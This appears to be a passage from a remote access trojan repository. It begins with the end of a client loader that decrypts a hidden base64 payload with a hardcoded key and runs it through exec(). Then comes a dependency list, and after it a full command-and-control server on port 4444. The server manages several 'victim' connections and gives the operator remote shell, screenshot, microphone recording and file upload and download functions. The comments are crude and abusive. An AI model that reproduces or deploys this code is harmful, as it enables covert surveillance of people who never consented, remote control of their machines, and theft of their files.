BRSjRwUE1Mc1FjVjV6WmRZVXRMZ3FTQXduaHNFUmZ0NXVEZlliaERpR0RyN1hMTXJmbHFGUkJreFBqR1RRTTdOcUt5ZGEzWUoyOFFVSDkzWnlqTmItcDNDYkdzR0J1REJzbHdGWVQwa2x1WE5RRHRhYWtTd1hIOWVoamdFa05ucV9KSGpIR1dOcnhWUXNkSnhRM21MVlgxVDJRMWdMM3hLSllkNTJ1Yjk3ZkNZc1RLby01NXNhM19WcFQ5a3Jhc1M0bm9QWVROZTZJRm82aFlONjF3bW5hZk1IYnd3bDk1Ri1qNzZuVU4wMF8zcmN6T0VqaUNlUzljdjB1aHBQNmZONUFjbHI2X0ZVelE0bWpURjZqdGpDUVljWGZSUDVySW9hOU9XdDZobXY0X1JFSm9CdVNkZVo1aVM5MGJUb2JBMHl4UUNocXdicUxFMnBDT2lHcnJOSzVpYzNUUUZwdGI0blJoNXVLN252d2NMMFZMTjFyZU1sbGlTT3Jlem8xanlmbHdVemRvQVhzempRcHFGQWUtT3BDRzJadDItYWZ1bXZJX2t4akVrZWZ1a19uaHdXVjVuUmtBcUt0VDhmSTE0RE5lV0NqR3RPWmFYSjZTZ2VwRWJkV1VFczRMQXJzeWJQcjd0UHRnRkplcDVwWUNJRG5FRC03WUFmRVpHem10NXc1UWJqdVlHS19ZM1BYVk8ySmxoOUFhUWFCb1NheGN3M0Q3cW4yc3A4eGxNMEZsQzRSOFAxV1pJaXFVUHJTenEybDQ4QWZwY3BiVWJ3ekp2TVdEU3M1NFVYNUtmLS0xUVRoZXVXWmN5Y0JXajJZWjE1MHNqN00ydUNmYXU2SUp0Q3BUTzhsWUNIMV9xZkNjQ2VCQmlETmZzdkxhQ2o5a0g5YjN2UE1Cay1IMUhJMEhsUFdQYnVIVFZZRlJBSDNZcmlrdFFvUE1uU0tpTWZ1UDdIQkpOaVJLRktUWnlJRzFVcGVGWm1pSDZrbEROazU3VHBWcm04bjB0ZVZ4Y2dCMkdSM1hrTHVsY3VrQWxhN29oemtQM0V6V0tkUEllRFFmSkFoRGZ1cE9kcUo0bjVaMHExclR3ZVhwNmxIVTh6ckt5eFJNWGJHaWo0R25BVDRjUi1zeGJSNGZTeGRCeTJKa0F6TkgwU0t2cDBKalV1U2VxYmVLVTlBUERhRERzck1MTU5MYUhaQkk3QVdudHo1MVZZYXh3bk4yX0dTODV5VDR1djh2aTlXYnh3V1VHNERNUF9TWEFBQnNKNFhfbjdTS3g4TWZCX2ZNanBSd21FQUdDeUFCVnBsdzVubl9RZE4wbXk3ZzBXbjlSVXZEQzJwZElBWm45b0hPWTFpRjB5cEFSYnpTWS02VEJzV0JZOXpsb2RzaTdQbWFjMHFKVTRYc1pnM3lPbkhwa1J3dXNjXzNiNlVObGFJVnNmQTJRc25TamhQaEF0ZnJhdEFBbTBmRi1tak5lMzNHUEtRbktmelg1WlFRUjAyT05sdXZ3SGd1bDFxYVI0ZGRMWTk4QUdzbjJSQkJPRl9BVnVlOC1HRHE3MVJsaFRVampDQl96WjAyZU5lY1R1WmROc2lOM2w5bUNRTnByMjVfUmoyZ2tJLWRKalIzanNaSUVBNGduVnZWVGt6a213eW0tUGtCSGxUYU5DakFpQk1EbVg1UEt4RFNjWE5QNVktSHU1TVNNWG05LWJmRUM4TGhLYXVPM1p2ci1BUzV5UTgwZzlHWi0wZ3Y4QUUtU2hBTEMtYkthVUhfUU16ZDRZcy1IRzhyMVlJanNOVmRfZ2Y3b3gtM29NRUl5TTl2U1pKSnl5VUNUa1BsREFnRmYwU0k3Sl9xNW5Za1hMZXBuUXYtSVdpYzZUVVhtWktlRWVWdnpwQkpnWmExc1k0aUtWdmNTRTZyMDk5dHVlS1JtUG5qNGxiVS10c2poUGtHanZldnQ0X1VrcFMtbXpHWDNzWVQ4ZjJLd09YV1JvMG1RQWNLZGh6MWJIbnN5RGtYX0c1R3kwQVUtQXRZdDlGUC0yQnBiT2pKaEItNEo1cUxGQ1pJWVQ5TUluTk5XaS1wWmw3d0pmWGhSNmxYcnpwWTFWbXRRN2VSWkVEQ2FiTVc4Z3RfaTFidGxPZmVCb3FETjhqUXNNNjNBS09mVUliaTRieVl4WmVGd2c5THNWMEFldFRLMklVMVZfdTgwOVRsTV8xWXBPV1JOZGJRaHhJdVNDY2M1dUk0dUR4TUNfcHJMRU9CMWpGZEtDVm5NT0pFclJCZDlLakZreElKSmk2eFgta2h0cHo5SktObW5naE8tRGwtNWJNM2dkZ0w2dDJHUE9IWW9vWFFsZGdFbmNsNVZuVWs4dmtSajZXS0lkcTdPVXRaa2hSb0x0R0FmeUxWTGltSF9jRkRkN2pQY2pWOGFSc1QyT2NFY3BQVXkwWDJqbGZDc0R3RFpLek1ndVVNcWt0ek5oZWstVlVyOHFKeUM4NGZqR1V6X3FuRHdXcWZ1QTBNc2otbDNzUnU4b1h4UXNORU5UU1ZET2JYU3g3OWtkQXFIbXBFVTIxWS1aWDdLc0pvdTFyaDJxOUlSSzhIWHE5STlCanpsalZMaTh6cFJQMWNPWGdpZ3QyNWtfTFFkLTVXd2tqNFpVTDJwWU1OOXRDRmtBR1otR05HVmEtdnVLMTBrTjZ6SF9MUDQtNDhHR2dfWV9FbjBtWTBqUm1Oajg2MVNDZmVRRko2aWN1NjBNUkd3TUlGZldWMmN3ZXhQRzJiOWFuUDRid2tMNnNWeVgyYk9abXFZdVNsdWtMdE92eFI2Ynp6bkE5cnB0N0lnMEo0MUpTSGctdkhRYWUyb1NIVGpCUUV4bFhJbkJ3bDNHQTk5ZUhvOTJnZEl6V0laQVhHUnVmenVFMEZzNG9SUlpmaTVZNFhfQWhweGx5Rk93R01HNy1qSVVMY052S2ZWeEFUZ3p5dGJjdVN1ZDFGWWtWYVdhYWgtWngyM0dlN2xzMjdFb19sSjZqQmZWM0dxRzFqYi1DY3NhSXNQTWxUNkNQN3J0OUVYNGt3MFdGTHdMUFRmcjhxc0s3clpJaTVKbFEyRDNfUUxfSzY2elNmTTBjQ0hoNVBua2R5ejlRUnplLXlFLWJINGExY1BDX2ZlNHJKbFg5UT0=' 17 | unbase64 = base64.b64decode(data) 18 | password_provided = "V3ryS3cur3P4ssw0rd" # This is input in the form of a string 19 | password = password_provided.encode() # Convert to type bytes 20 | salt = "SocketProgrammingisCool".encode() # CHANGE THIS - recommend using a key from os.urandom(16), must be of type bytes 21 | kdf = PBKDF2HMAC( 22 | algorithm=hashes.SHA256(), 23 | length=32, 24 | salt=salt, 25 | iterations=100000, 26 | backend=default_backend() 27 | ) 28 | key = base64.urlsafe_b64encode(kdf.derive(password)) 29 | fernet = Fernet(key) 30 | encrypted = fernet.decrypt(unbase64) 31 | real_shit = encrypted.decode() 32 | #print(real_shit) 33 | exec(real_shit) 34 | 35 | 36 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | altgraph==0.17 2 | auto-py-to-exe==2.7.8 3 | beautifulsoup4==4.9.1 4 | bottle==0.12.18 5 | bottle-websocket==0.2.9 6 | certifi==2020.6.20 7 | cffi==1.14.2 8 | chardet==3.0.4 9 | cryptography==3.1 10 | docopt==0.6.2 11 | Eel==0.12.4 12 | future==0.18.2 13 | gevent==20.6.2 14 | gevent-websocket==0.10.1 15 | greenlet==0.4.16 16 | idna==2.10 17 | Js2Py==0.70 18 | MouseInfo==0.1.3 19 | packaging==20.4 20 | pefile==2019.4.18 21 | Pillow==7.2.0 22 | pipwin==0.5.0 23 | PyAutoGUI==0.9.50 24 | PyAudio==0.2.11 25 | pycparser==2.20 26 | PyGetWindow==0.0.8 27 | pyinstaller==4.0 28 | pyinstaller-hooks-contrib==2020.7 29 | pyjsparser==2.7.1 30 | PyMsgBox==1.0.8 31 | pyparsing==2.4.7 32 | pyperclip==1.8.0 33 | PyPrind==2.11.2 34 | PyRect==0.1.4 35 | PyScreeze==0.1.26 36 | pySmartDL==1.3.3 37 | PyTweening==1.0.3 38 | pytz==2020.1 39 | pywin32-ctypes==0.2.0 40 | requests==2.24.0 41 | six==1.15.0 42 | soupsieve==2.0.1 43 | tzlocal==2.1 44 | urllib3==1.25.10 45 | whichcraft==0.6.1 46 | zope.event==4.4 47 | zope.interface==5.1.0 48 | -------------------------------------------------------------------------------- /server/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | import time 4 | import sys 5 | from queue import Queue 6 | import struct 7 | import signal 8 | import wave 9 | import os 10 | import subprocess 11 | NUMBER_OF_THREADS = 2 12 | JOB_NUMBER = [1, 2] 13 | queue = Queue() 14 | 15 | COMMANDS = {'help':['Shows this help'], 16 | 'list':['Lists connected clients'], 17 | 'select':['Selects a client by its index. Takes index as a parameter'], 18 | 'quit':['Stops current connection with a client. To be used when client is selected'], 19 | 'record ':['Records sound of client till amount of time which you specified'], 20 | 'screenshot ':['Takes a screenshot of client\'s screens'], 21 | 'upload ':['To upload a file to client.'], 22 | 'download ':['To download a file from client.'], 23 | 'shutdown':['Shuts server down'], 24 | } 25 | 26 | class MultiServer(object): 27 | 28 | def __init__(self): 29 | self.host = '' 30 | self.port = 4444 31 | self.socket = None 32 | self.all_connections = [] 33 | self.all_addresses = [] 34 | 35 | def print_help(self): 36 | for cmd, v in COMMANDS.items(): 37 | print("{0}:{1}".format(cmd, v[0])) 38 | return 39 | 40 | def register_signal_handler(self): 41 | signal.signal(signal.SIGINT, self.quit_gracefully) 42 | signal.signal(signal.SIGTERM, self.quit_gracefully) 43 | return 44 | 45 | def quit_gracefully(self, signal=None, frame=None): 46 | print('\nQuitting gracefully') 47 | for conn in self.all_connections: 48 | try: 49 | conn.send(str.encode('quit')) 50 | conn.shutdown(2) 51 | conn.close() 52 | except Exception as e: 53 | print('Could not close connection %s' % str(e)) 54 | # continue 55 | self.socket.close() 56 | sys.exit(0) 57 | 58 | def socket_create(self): 59 | try: 60 | self.socket = socket.socket() 61 | except socket.error as msg: 62 | print("Socket creation error: " + str(msg)) 63 | # TODO: Added exit 64 | sys.exit(1) 65 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 66 | return 67 | 68 | def socket_bind(self): 69 | """ Bind socket to port and wait for connection from client """ 70 | try: 71 | self.socket.bind((self.host, self.port)) 72 | self.socket.listen(5) 73 | except socket.error as e: 74 | print("Socket binding error: " + str(e)) 75 | time.sleep(5) 76 | self.socket_bind() 77 | return 78 | 79 | def accept_connections(self): 80 | """ Accept connections from multiple clients and save to list """ 81 | for c in self.all_connections: 82 | c.close() 83 | self.all_connections = [] 84 | self.all_addresses = [] 85 | while 1: 86 | try: 87 | conn, address = self.socket.accept() 88 | conn.setblocking(1) 89 | client_hostname = conn.recv(1024).decode("utf-8") 90 | address = address + (client_hostname,) 91 | except Exception as e: 92 | print('Error accepting connections: %s' % str(e)) 93 | # Loop indefinitely 94 | continue 95 | self.all_connections.append(conn) 96 | self.all_addresses.append(address) 97 | print('\nConnection has been established: {0} ({1})'.format(address[-1], address[0])) 98 | return 99 | 100 | def start_turtle(self): 101 | """ Interactive prompt for sending commands remotely """ 102 | while True: 103 | cmd = input('shell>') 104 | if cmd == 'list': 105 | self.list_connections() 106 | continue 107 | elif 'select' in cmd: 108 | target, conn = self.get_target(cmd) 109 | if conn is not None: 110 | self.send_target_commands(target, conn) 111 | elif cmd == 'shutdown': 112 | queue.task_done() 113 | queue.task_done() 114 | print('Server shutdown') 115 | break 116 | # self.quit_gracefully() 117 | elif cmd == 'help': 118 | self.print_help() 119 | elif cmd == '': 120 | pass 121 | else: 122 | print('Command not recognized') 123 | return 124 | 125 | def list_connections(self): 126 | """ List all connections """ 127 | results = '' 128 | for i, conn in enumerate(self.all_connections): 129 | try: 130 | conn.send(str.encode(' ')) 131 | conn.recv(20480) 132 | except: 133 | del self.all_connections[i] 134 | del self.all_addresses[i] 135 | continue 136 | results += str(i) + ' ' + str(self.all_addresses[i][0]) + ' ' + str( 137 | self.all_addresses[i][1]) + ' ' + str(self.all_addresses[i][2]) + '\n' 138 | print('----- Clients -----' + '\n' + results) 139 | return 140 | 141 | def get_target(self, cmd): 142 | """ Select target client 143 | :param cmd: 144 | """ 145 | target = cmd.split(' ')[-1] 146 | try: 147 | target = int(target) 148 | except: 149 | print('Client index should be an integer') 150 | return None, None 151 | try: 152 | conn = self.all_connections[target] 153 | except IndexError: 154 | print('Not a valid selection') 155 | return None, None 156 | print("You are now connected to " + str(self.all_addresses[target][2])) 157 | return target, conn 158 | 159 | def read_command_output(self, conn): 160 | """ Read message length and unpack it into an integer 161 | :param conn: 162 | """ 163 | raw_msglen = self.recvall(conn, 4) 164 | if not raw_msglen: 165 | return None 166 | msglen = struct.unpack('>I', raw_msglen)[0] 167 | # Read the message data 168 | return self.recvall(conn, msglen) 169 | 170 | def recvall(self, conn, n): 171 | """ Helper function to recv n bytes or return None if EOF is hit 172 | :param n: 173 | :param conn: 174 | """ 175 | # TODO: this can be a static method 176 | data = b'' 177 | while len(data) < n: 178 | packet = conn.recv(n - len(data)) 179 | if not packet: 180 | return None 181 | data += packet 182 | return data 183 | def discardAll(self, conn): 184 | """ Helper function specially made for download 185 | Enjoy Mother Fucker""" 186 | # TODO: this can be a static method 187 | chunk_bitch = conn.recv(len("File_NotFound")) 188 | if(chunk_bitch == "File_NotFound".encode()): 189 | print("fucking idiot both address are wrong") 190 | time.sleep(1) 191 | print(conn.send("ok".encode())) 192 | return 193 | else: 194 | while True: 195 | if (chunk_bitch[-4:] == "sent".encode()): 196 | break 197 | chunk_bitch = conn.recv(1024) 198 | conn.send("ok".encode()) 199 | print("ok") 200 | return 201 | 202 | def send_target_commands(self, target, conn): 203 | """ Connect with remote target client 204 | :param conn: 205 | :param target: 206 | """ 207 | conn.send(str.encode(" ")) 208 | cwd_bytes = self.read_command_output(conn) 209 | cwd = str(cwd_bytes, "utf-8") 210 | print(cwd, end="") 211 | while True: 212 | try: 213 | while(True): 214 | cmd = input() 215 | check = cmd.split(" ") 216 | if(check[0] == "screenshot"): 217 | if(len(check) == 2): 218 | conn.send(str.encode(cmd)) 219 | break 220 | elif(check[0] == "download" or check[0] == "upload" ): 221 | if(len(check) == 3): 222 | conn.send(str.encode(cmd)) 223 | break 224 | elif(check[0] == "record"): 225 | if(len(check)== 2 or len(check)== 3 ): 226 | conn.send(str.encode(cmd)) 227 | break 228 | else: 229 | if cmd == '' or cmd == 'clear': 230 | cmd = "cd" 231 | conn.send(str.encode(cmd)) 232 | break 233 | print("Invalid Syntaxt") 234 | conn.send(str.encode("cd")) 235 | if cmd == 'quit': 236 | conn.send(str.encode(cmd)) 237 | break 238 | if cmd.split(" ")[0] == "screenshot": 239 | f = open(str(cmd.split(" ")[1].rstrip())+".png",'wb') 240 | flag = None 241 | text = None 242 | print(conn.recv(len("sending"))) 243 | while True: 244 | print('recving') 245 | m = conn.recv(1024) 246 | text = m 247 | if m: 248 | while m: 249 | if(text[-4:] == 'sent'.encode()): 250 | text = text[:-4] 251 | break 252 | m = conn.recv(1024) 253 | text += m 254 | break 255 | else: 256 | break 257 | f.write(text) 258 | f.close() 259 | print("Screenshot saved") 260 | conn.send("ok".encode()) 261 | cmd_output = self.read_command_output(conn) 262 | client_response = str(cmd_output, "utf-8") 263 | print(client_response, end="") 264 | elif cmd.split(" ")[0] == "record": 265 | frames = [] 266 | if(conn.recv(9).decode("UTF_8")== "recording"): 267 | while(True): 268 | chunk = conn.recv(1024) 269 | if( chunk[-14:] == "done_recording".encode()): 270 | break 271 | frames.append(chunk) 272 | print("creating file") 273 | wf = wave.open(cmd.split(" ")[1]+".wav", 'wb') 274 | wf.setnchannels(2) 275 | wf.setsampwidth(2) 276 | wf.setframerate(44100) 277 | wf.writeframes(b''.join(frames)) 278 | wf.close() 279 | print("Audio Saved") 280 | conn.send("ok".encode()) 281 | cmd_output = self.read_command_output(conn) 282 | client_response = str(cmd_output, "utf-8") 283 | print(client_response, end="") 284 | elif cmd.split(" ")[0] == "download": 285 | try: 286 | f = open(str(cmd.split(" ")[2].rstrip()),'wb') 287 | flag = None 288 | text = None 289 | while True: 290 | m = conn.recv(len("File_NotFound")) 291 | if( m == "File_NotFound".encode()): 292 | print("File Not Found at victim side") 293 | f.close() 294 | name = str(cmd.split(" ")[2].rstrip()) 295 | os.remove(name) 296 | flag = True 297 | conn.send("ok".encode()) 298 | break 299 | text = m 300 | if m: 301 | while m: 302 | if(text[-4:] == 'sent'.encode()): 303 | text = text[:-4] 304 | break 305 | m = conn.recv(1024) 306 | text += m 307 | break 308 | else: 309 | break 310 | if flag: 311 | cmd_output = self.read_command_output(conn) 312 | client_response = str(cmd_output, "utf-8") 313 | print(client_response, end="") 314 | continue 315 | f.write(text) 316 | f.close() 317 | print("file recived") 318 | conn.send("ok".encode()) 319 | cmd_output = self.read_command_output(conn) 320 | client_response = str(cmd_output, "utf-8") 321 | print(client_response, end="") 322 | except Exception as e: 323 | print(e) 324 | print("Invaild Syntaxt 1st arg for which file you wanna download from victims machine and 2nd arg is which filename it would be save on your machine") 325 | self.discardAll(conn) 326 | cmd_output = self.read_command_output(conn) 327 | client_response = str(cmd_output, "utf-8") 328 | print(client_response, end="") 329 | elif cmd.split(" ")[0] == "upload": 330 | try: 331 | print(str(cmd.split(" ")[1].rstrip())) 332 | f = open (str(cmd.split(" ")[1].rstrip()), "rb") 333 | l = os.path.getsize(str(cmd.split(" ")[1].rstrip())) 334 | m = f.read(l) 335 | time.sleep(2) 336 | conn.sendall(m+"sent".encode()) 337 | f.close() 338 | print(conn.recv(2)) 339 | cmd_output = self.read_command_output(conn) 340 | client_response = str(cmd_output, "utf-8") 341 | print(client_response, end="") 342 | except Exception as e: 343 | time.sleep(2) 344 | print("File Not Found at attacker side") 345 | conn.send("File_NotFound".encode()) 346 | print(conn.recv(2)) 347 | print("Invaild Syntaxt 1st arg for which file you wanna upload and 2nd arg is which filename it would be save in victims machine") 348 | cmd_output = self.read_command_output(conn) 349 | client_response = str(cmd_output, "utf-8") 350 | print(client_response, end="") 351 | elif cmd == "cls": 352 | tmp = subprocess.call('clear',shell=True) 353 | else: 354 | cmd_output = self.read_command_output(conn) 355 | client_response = str(cmd_output, "utf-8") 356 | print(client_response, end="") 357 | except Exception as e: 358 | print("Connection was lost %s" %str(e)) 359 | break 360 | del self.all_connections[target] 361 | del self.all_addresses[target] 362 | return 363 | def create_workers(): 364 | """ Create worker threads (will die when main exits) """ 365 | server = MultiServer() 366 | server.register_signal_handler() 367 | for _ in range(NUMBER_OF_THREADS): 368 | t = threading.Thread(target=work, args=(server,)) 369 | t.daemon = True 370 | t.start() 371 | return 372 | 373 | 374 | def work(server): 375 | """ Do the next job in the queue (thread for handling connections, another for sending commands) 376 | :param server: 377 | """ 378 | while True: 379 | x = queue.get() 380 | if x == 1: 381 | server.socket_create() 382 | server.socket_bind() 383 | server.accept_connections() 384 | if x == 2: 385 | server.start_turtle() 386 | queue.task_done() 387 | return 388 | 389 | def create_jobs(): 390 | """ Each list item is a new job """ 391 | for x in JOB_NUMBER: 392 | queue.put(x) 393 | queue.join() 394 | return 395 | 396 | def main(): 397 | create_workers() 398 | create_jobs() 399 | 400 | 401 | if __name__ == '__main__': 402 | main() 403 | --------------------------------------------------------------------------------